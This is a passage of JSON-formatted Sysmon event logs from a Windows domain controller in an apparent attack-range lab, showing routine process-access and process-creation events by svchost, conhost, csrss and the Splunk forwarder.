ws\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2144,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2145,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2146,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.911\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-0010A9F90300}\r\nTargetProcessId: 3876\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.911","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-0010A9F90300}","TargetProcessId":"3876","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2147,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.024\r\nProcessGuid: {E2A3D6B1-1070-5F25-0000-00103BFF0300}\r\nProcessId: 4000\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinHostMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.024","ProcessGuid":"{E2A3D6B1-1070-5F25-0000-00103BFF0300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinHostMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2148,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.021\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 3812\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1070-5F25-0000-00103BFF0300}\r\nTargetProcessId: 4000\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.021","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"3812","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1070-5F25-0000-00103BFF0300}","TargetProcessId":"4000","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2149,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.021\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1070-5F25-0000-00103BFF0300}\r\nTargetProcessId: 4000\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.021","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1070-5F25-0000-00103BFF0300}","TargetProcessId":"4000","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2150,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.021\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.021","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2151,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.021\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.021","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2152,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.021\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 